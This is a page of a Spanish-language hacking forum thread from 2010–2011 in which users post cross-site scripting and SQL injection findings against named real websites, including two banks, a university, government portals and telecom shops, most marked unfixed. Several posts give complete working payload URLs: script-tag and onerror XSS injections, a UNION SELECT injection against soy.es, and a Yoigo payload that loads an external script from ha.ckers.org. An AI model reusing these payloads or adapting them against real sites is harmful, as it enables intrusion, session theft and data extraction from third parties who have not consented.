elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Recopilatorio de Vulnerabilidades de XSS/SQLinjection
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 [4] 5 6 Ir Abajo Respuesta Imprimir
Autor Tema: Recopilatorio de Vulnerabilidades de XSS/SQLinjection  (Leído 88,367 veces)
Guide_Shen

Desconectado Desconectado

Mensajes: 24


http://guideshen.blogspot.com


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #30 en: 17 Octubre 2010, 21:07 pm »

Sitio web: http://search.oracle.com/
Descubridor: sh3n
URL del aviso: http://www.xssed.com/mirror/69865/
Fecha de descubrimiento: 14 de Octubre del 2010
Fecha de notificación: 14 de Octubre del 2010
Fecha de publicación: 15 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/d56mSZ
En línea

Evolution of Revolution  -  http://xsstorm.blogspot.com
Guide_Shen

Desconectado Desconectado

Mensajes: 24


http://guideshen.blogspot.com


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #31 en: 28 Octubre 2010, 13:41 pm »

Sitio web: http://webapp.iss.net/
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/10/httpwebappissnet-xss-vuln-ibm-iss.html
Fecha de descubrimiento: 16 de Octubre del 2010
Fecha de notificación: 20 de Octubre del 2010
Fecha de publicación: 28 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/c8aZic
Post Data:
En línea

Evolution of Revolution  -  http://xsstorm.blogspot.com
Guide_Shen

Desconectado Desconectado

Mensajes: 24


http://guideshen.blogspot.com


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #32 en: 28 Octubre 2010, 13:45 pm »

Sitio web: http://www.admin.cam.ac.uk/
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/10/httpwwwadmincamacuk-xss-vuln-xshacked.html
Fecha de descubrimiento: 16 de Octubre del 2010
Fecha de notificación: 20 de Octubre del 2010
Fecha de publicación: 28 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/bJky87
Post Data:
En línea

Evolution of Revolution  -  http://xsstorm.blogspot.com
Guide_Shen

Desconectado Desconectado

Mensajes: 24


http://guideshen.blogspot.com


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #33 en: 9 Noviembre 2010, 22:12 pm »

Sitio web: http://www.pichincha.com/
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/11/pichinchacom-ecuator-bank-xss-bug.html
Fecha de descubrimiento: 08 de Noviembre del 2010
Fecha de notificación: 09 de Noviembre del 2010
Fecha de publicación: 09 de Noviembre del 2010
Arreglado : NO, UNFIXED
Información adicional: Banco Ecuatoriano
poc: http://bit.ly/bzEtrC
En línea

Evolution of Revolution  -  http://xsstorm.blogspot.com
Guide_Shen

Desconectado Desconectado

Mensajes: 24


http://guideshen.blogspot.com


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #34 en: 9 Noviembre 2010, 22:16 pm »

Sitio web: https://www.suntrust.com/
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/11/suntrustcom-bank-xss-bug.html
Fecha de descubrimiento: 08 de Noviembre del 2010
Fecha de notificación: 09 de Noviembre del 2010
Fecha de publicación: 09 de Noviembre del 2010
Arreglado : NO, UNFIXED
Información adicional: Banco USA
poc: http://bit.ly/94jUw8
Post Data:
En línea

Evolution of Revolution  -  http://xsstorm.blogspot.com
Cleantesdeasso

Desconectado Desconectado

Mensajes: 185



Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #35 en: 10 Diciembre 2010, 22:10 pm »


Sitio web:http://www.buenosaires.gov.ar/areas/educacion/establecimientos/index.php?idgestion=
Descubridor:clean735
URL del aviso:http://txt.io/clean735
Fecha de descubrimiento:10 de diciembre 2010
Fecha de notificación:10 de diciembre
Fecha de publicación: 10 de diciembre
Arreglado: no lo se
Información adicional:no m gusta macri. XSS en el buscador
Código:
http://www.buenosaires.gov.ar/areas/educacion/establecimientos/index.php?idgestion=0&idoferta&idsala=0&idjornada=0&idmodalidad=0&idtitulo=0&idbarrio&idcgpc&distrito&texto=%3Cimg+src%3D.+onerror%3Dalert%28String.fromCharCode%2877%2C97%2C99%2C114%2C105%2C95%2C110%2C97%2C122%2C105%29%29%3E&Buscar2=Buscar&redir=1&menu_id=10194
En línea

"Que no!! q el hash hay q crakiarlo!!"
iNETFRUIT

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #36 en: 1 Enero 2011, 11:07 am »

Sitio web: http://www.soy.es/
Descubridor: INETFRUIT +
Fecha de descubrimiento: 28 de Diciembre del 2010
Fecha de notificación: 28 de Diciembre del 2010
Fecha de publicación: 01 de Enero del 2011
Arreglado : no, unfixed.
Información adicional: Blogs gratis

Código:
http://soy.es/index.php?pag=indice&cat=1+and+1=2+union/**/select+0x30,0x31,0x32,concat%280x3A3078623464633064333A%29,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235--+--
En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #37 en: 17 Mayo 2011, 13:53 pm »

Sitio web: http://tienda.vodafone.es
Descubridor: tragantras
URL del aviso:   http://pastebin.com/8Q9789Y6
Fecha de descubrimiento: 17 Mayo del 2007
Fecha de notificación: 17 Mayo del 2007
Fecha de publicación: 17 Mayo del 2007
Arreglado: Not yet!
Información adicional:
Código:
XSS

http://tienda.vodafone.es/movil/samsung/galaxy_s_8gb?s=asdf%22%3Easd%3C/a%3E%3CsCrIpT%3Ealert%28%27xungo%20XSS!%27%29;%3C/sCrIpT%3E%3Csdf%20foo=%22
En línea

Colaboraciones:
1 2
tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #38 en: 21 Mayo 2011, 01:03 am »

Sitio web: www.yoigo.com
Descubridor: tragantras
URL del aviso: http://pastebin.com/WcRqGqaW
Fecha de descubrimiento: 21 Mayo del 2007
Fecha de notificación: 21 Mayo del 2007
Fecha de publicación: 21 Mayo del 2007
Arreglado: Not yet!
Información adicional:
Código:
XSS

POC FIREFOX & SECURELESS WEB-BROWSERS
http://www.yoigo.com/buscador.php?buscar=%22%20/%3E%3Cscript%3Ealert%283%29;%3C/script%3E

POC CHROME:
http://www.yoigo.com/buscador.php?buscar=%22%3E%3Cscript%20src=http://ha.ckers.org/xss.js?

« Última modificación: 21 Mayo 2011, 01:07 am por tragantras » En línea

Colaboraciones:
1 2
franco_tuv

Desconectado Desconectado

Mensajes: 5



Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #39 en: 23 Julio 2011, 18:24 pm »

Sitio web: http://www.tvpublica.com.ar
Descubridor: franco_tuv
Fecha de descubrimiento: 20 de Julio del 2011
Fecha de notificación: 20 de Julio del 2011
Fecha de publicación: 23 de Julio del 2011
Arreglado : No
Información adicional:
Código:
http://www.tvpublica.com.ar/tvpublica/busqueda?searchText=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E&page=1
En línea

Páginas: 1 2 3 [4] 5 6 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Recopilatorio de C#
.NET (C#, VB.NET, ASP)
/* strcpy() */ 3 8,406 Último mensaje 5 Junio 2007, 17:50 pm
por piroman
Como hacer update en SQLinjection
Nivel Web
BlackHKR 6 6,485 Último mensaje 12 Mayo 2010, 20:55 pm
por BHK
Duda SQLinjection en information_schema « 1 2 »
Nivel Web
miguelskk 10 8,517 Último mensaje 17 Julio 2010, 01:46 am
por TapIt
AYUDA:Captura de paquetes con Wireshark para herramienta SQLinjection
Hacking
NetStorm 1 3,824 Último mensaje 5 Octubre 2011, 00:06 am
por alpha015
SQLInjection sin acceso a information_schema
Nivel Web
buggy_man 3 3,281 Último mensaje 11 Agosto 2012, 07:17 am
por afdlkglfgfdgfhgf
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines